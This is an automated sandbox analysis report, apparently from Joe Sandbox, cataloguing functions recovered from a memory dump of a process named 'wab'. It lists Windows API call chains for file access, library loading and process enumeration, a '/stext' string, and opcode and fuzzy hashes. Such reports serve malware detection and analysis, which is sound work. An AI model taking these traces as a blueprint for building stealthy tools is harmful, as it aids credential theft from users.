• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
• Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
• Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
• Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
• Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0
• Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
• Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
• Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
• Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
• Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
• String ID:
• API String ID: 159017214-0
• Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
• Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
• Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
• Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
• Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                          • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$??2@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3700833809-0
                                                                                                                                                                                                          • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                          • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1481295809-0
                                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
• Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
• Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
• Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
Uniqueness
• Uniqueness Score: -1.00%

APIs
